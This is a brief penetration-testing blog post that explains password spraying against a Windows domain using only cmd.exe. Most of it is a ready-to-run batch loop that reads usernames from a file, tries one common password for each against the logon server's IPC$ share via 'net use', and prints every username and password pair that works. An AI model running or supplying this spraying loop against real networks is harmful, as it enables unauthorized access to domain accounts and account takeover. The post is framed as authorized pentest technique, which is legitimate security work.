Internal Infrastructure Pentest - Password Spraying With CMD

less than 1 minute read

Password Spraying: It is a technique of trying one password across all the domain users.

- No tool needed. One can perform password spraing using cmd.exe
  - net use %LOGONSERVER%\IPC$ /delete
  - set PASSWORD=Password1
  - FOR /F %n in (Documents\users.txt) DO @((net use %LOGONSERVER%\IPC$ /user:%USERDOMAIN%\%n %PASSWORD%
    1>NUL 2>&1 && echo. && echo [*] %n:%PASSWORD% && net use /delete %LOGONSERVER%\IPC$  > NUL) || < set /p =.)
    
    
    Thanks to : Black Hills Information Security (https://www.blackhillsinfosec.com/)

Share on

Twitter Facebook LinkedIn

Viral Maniar

Internal Infrastructure Pentest - Password Spraying With CMD

Share on

You may also enjoy

Destroying Cloud Infrastructure with Nuking Tools

Installing Kali in AWS EC2 Instance

Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket

The Power of In-Memory Executions: How to Execute Code without Touching Disk